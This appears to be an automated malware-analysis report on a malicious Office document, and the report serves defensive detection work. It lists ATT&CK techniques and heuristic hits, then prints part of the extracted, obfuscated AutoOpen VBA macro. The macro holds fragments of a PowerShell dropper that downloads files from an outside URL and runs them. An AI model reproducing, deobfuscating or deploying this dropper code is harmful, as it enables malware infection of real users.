MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute external code. The script attempts to download a payload from a URL, which is a common technique for malware droppers. The ClamAV detection of 'Img.Dropper.PhishingLure-6443153-0' further supports this assessment.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73893 bytes |
SHA-256: 2c32ae464a31f24d177952ba82dc4badfda251f76f8031f2371c49630a121b52 |
|||
|
Detection
ClamAV:
Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tdsWwfJjr"
Function BmhDjZa()
On Error Resume Next
YMbLAXTWMuz = 44224474 / AiDjHhrYvM - 536083786 + CSng(fQjkdVN) + 2 - Chr(7013) - MVvphoPbXmGaHE / 8527 * oKrrSzYolnMlkY + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GEcKwCF)
iRKri = 44224474 / mYPDvcc - 536083786 + CSng(soYcYumbb) + 2 - Chr(7013) - cozFQiMWjQMM / 8527 * osvYZjPMhz + Fix(7798) + 9905 * Sin(7) / 310 * Sin(RBHpjZpFI)
KGdnAIiUQM = Mid("H5MQzv1NdDoYDC+YDCwnltwC+twCoYDC+YDCadFileYDC+YD'+'C(YDC+YDCtwC+twC2z8abcYDC+twC+twCYD'+'C.ToString(),YDC+twC+twCYDC 2z8huaYDC+YDCs);InvoYD'+'C+YDCk'+'e-IteYDC+YDCm(2z8huas);bYDC+YDCrYDC+YDCeak;}cYkzOwCfjCfJJYN8YjPilO7EwhD", 10, 188)
rwNrGzZDVkY = 44224474 / WsrGTlplwbQuZ - 536083786 + CSng(duuohJBUCiDT) + 2 - Chr(7013) - BzwIwjRVzat / 8527 * CvBPJTd + Fix(7798) + 9905 * Sin(7) / 310 * Sin(UahQIVvrBpM)
EwKNaavdJtn = 44224474 / tNYUTtWi - 536083786 + CSng(TGLdiHmqCLHSGd) + 2 - Chr(7013) - RajHiXN / 8527 * MtCupuXG + Fix(7798) + 9905 * Sin(7) / 310 * Sin(nIdHDvIZFFuqVt)
rDbjpq = 44224474 / zFonATU - 536083786 + CSng(IPdUBjfO) + 2 - Chr(7013) - FsLZoLaPjAaoaU / 8527 * NqFwHNOq + Fix(7798) + 9905 * Sin(7) / 310 * Sin(SWEwNOZqjrwwBd)
waHvaz = Mid("J84HR0+[chAR]122t'+'wC+twC+[chAR]56),YDCCxcYDC).rePlAcE((zPrTD65wHf", 6, 52)
aFTVm = 44224474 / jVDsJOzYFtwkf - 536083786 + CSng(wwfFLizA) + 2 - Chr(7013) - NfbidRTWqAPKTq / 8527 * wjokXNFKcMI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(OlKOpiaq)
dtmbrWX = 44224474 / rjLAwjnazqZj - 536083786 + CSng(itfXiqr) + 2 - Chr(7013) - tmKpDqHC / 8527 * zWzSafoRj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CWdVlwA)
QYnzO = 44224474 / ijVGlXHj - 536083786 + CSng(BcFAIfqMc) + 2 - Chr(7013) - HUwVVIFkjlZc / 8527 * AROzSimpzbMKf + Fix(7798) + 9905 * Sin(7) / 310 * Sin(OciYcFt)
oUjVhNQsD = Mid("CnQ2mIMpx/YDC+YDC,http:/'+'/www.YDC+YDCbrYDC'+'+YDCejkYDC+YDCish.YDC+YDCse/OkH4YDC+twC+twCYDC/,htYuC4ZiiVz", 8, 91)
BtZRJpCBz = 44224474 / jwAuPCXwwAL - 536083786 + CSng(pfYktDjlIOrGBl) + 2 - Chr(7013) - nQRZsCLYDMDGz / 8527 * binGlPXwschMPW + Fix(7798) + 9905 * Sin(7) / 310 * Sin(HusdNkifbS)
QbDwow = 44224474 / aEfTCfn - 536083786 + CSng(rMVkAMCBGFN) + 2 - Chr(7013) - PrYjVnPjMcBowO / 8527 * QGRYtCM + Fix(7798) + 9905 * Sin(7) / 310 * Sin(iHXwiHod)
SENrn = 44224474 / iGVXpwmqhfDzP - 536083786 + CSng(RpXorjmoEv) + 2 - Chr(7013) - KdkKtDMnt / 8527 * RcVmkaZpoEud + Fix(7798) + 9905 * Sin(7) / 310 * Sin(wvKqjmFp)
YHNFRSwYf = Mid("JF9wZCfLi98k4Rsww+YDC2z8nsadasd.n'+'ext(1, 34YDC+YD'+'C3245);2z8hYDC+YDCuas =YDC+YDC 2z8enYDC+YDCv:public + tYU3WitYYDC+YDCUYDC+YDC + 2z8YDC+YDCkYDC+Yt'+'wC+twCDCaraYDC+YDCp'+'as t'+'wC+twREfdl1Pm", 18, 171)
ztvOVko = 44224474 / rpmijzwOQEPP - 536083786 + CSng(jolKmvph) + 2 - Chr(7013) - zDiqYwrjb / 8527 * zUwGbTkHTJ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(wwzXaiKYVtn)
qSGwijOd = 44224474 / qdWNEWLURaHG - 536083786 + CSng(kzdCAnH) + 2 - Chr(7013) - fYmYtrqTP / 8527 * YFhwPzrbJfjjI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zOslQaVi)
LmlrNi = 44224474 / YsjDpaAWkcrQqk - 536083786 + CSng(JqCnWXqwGhTw) + 2 - Chr(7013) - jHFiLUYNr / 8527 * uhSmsVEjj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BBiTFRcitcWVc)
VjwSzZMW = Mid("EuObocv0nBwonC+twC+twC tYDC+YDCYYtwC+twCDC+YDCUYDC+YDC.exYDC+YDCetYYDC+YDC'+'U;foYDC+YDCrea'+'ch(2z8YDC+YDCabc iYDC+YDCn 2z8YDC+YDCbcdYDC'+'+YDC'+')YDC+twC+twCYD'+'C{YDC+YDCtry{2zYDC+YDC8fYDC+YDCranc.ulsJJfJCY3iaHULj9", 14, 187)
PobpRaplU = 44224474 / XKEkoLiVAC - 536083786 + CSng(iAVnhiLYichw) + 2 - Chr(7013) - aYfzFCoXq / 8527 * KlKOCQiJjjbd + Fix(7798) + 9905 * Sin(7) / 310 * Sin(sEDmPwEspOoJQf)
QnfnrwczJj = 44224474 / AJWXAYSzXMr - 536083786 + CSng(sVsSmhR) + 2 - Chr(7013) - YXtvrPfBdjd / 8527 * sYfOjREB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BbzwprsoWu)
Jifzkhv = 44224474 / QzOJsQKBWPI - 536083786 + CSng(zSBPpzZm) + 2 - Chr(7013) - BQZblrUXWFmkzt / 8527 * SRkiiCjXG
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.